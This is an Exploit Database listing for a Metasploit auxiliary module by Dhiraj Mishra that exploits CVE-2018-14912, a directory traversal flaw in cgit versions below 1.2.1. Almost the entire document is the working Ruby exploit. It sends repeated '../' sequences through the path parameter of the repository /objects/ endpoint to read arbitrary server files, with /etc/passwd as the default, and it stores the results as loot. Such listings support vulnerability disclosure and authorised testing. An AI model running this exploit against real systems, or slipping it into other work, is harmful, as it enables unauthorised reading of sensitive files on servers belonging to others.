cgit 1.2.1 – Directory Traversal (Metasploit)

• Exploit Database
• 15 阅读

• 作者： Dhiraj Mishra
  日期： 2018-08-14
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/45195/

• # Title: cgit 1.2.1 - Directory Traversal (Metasploit)
  # Author: Dhiraj Mishra
  # Software: cgit
  # Link: https://git.zx2c4.com/cgit/
  # Date: 2018-08-14
  # CVE: CVE-2018-14912
  # This module exploits a directory traversal vulnerability which exists 
  # in cgit < 1.2.1 cgit_clone_objects(), reachable when the configuration 
  # flag enable-http-clone is set to 1 (default).
  
  ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'cgit Directory Traversal',
  'Description' => %q{
  This module exploits a directory traversal vulnerability which
  exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the
  configuration flag enable-http-clone is set to 1 (default).
  },
  'References'=>
  [
  ['CVE', '2018-14912'],
  ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'],
  ['EDB', '45148']
  ],
  'Author'=>
  [
  'Google Project Zero', # Vulnerability discovery
  'Dhiraj Mishra' # Metasploit module
  ],
  'DisclosureDate' => 'Aug 03 2018',
  'License' => MSF_LICENSE
  ))
  
  register_options(
  [
  OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
  OptString.new('TARGETURI', [true, "The base URI path of the cgit install", '/cgit/']),
  OptString.new('REPO', [true, "Git repository on the remote server", '']),
  OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ])
  ])
  end
  
  def run_host(ip)
  filename = datastore['FILEPATH']
  traversal = "../" * datastore['DEPTH'] << filename
  
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri(target_uri.path, datastore['REPO'], '/objects/'),
  'vars_get' => {'path' => traversal}
  })
  
  unless res && res.code == 200
  print_error('Nothing was downloaded')
  return
  end
  
  vprint_good("#{peer} - \n#{res.body}")
  path = store_loot(
  'cgit.traversal',
  'text/plain',
  ip,
  res.body,
  filename
  )
  print_good("File saved in: #{path}")
  end
  end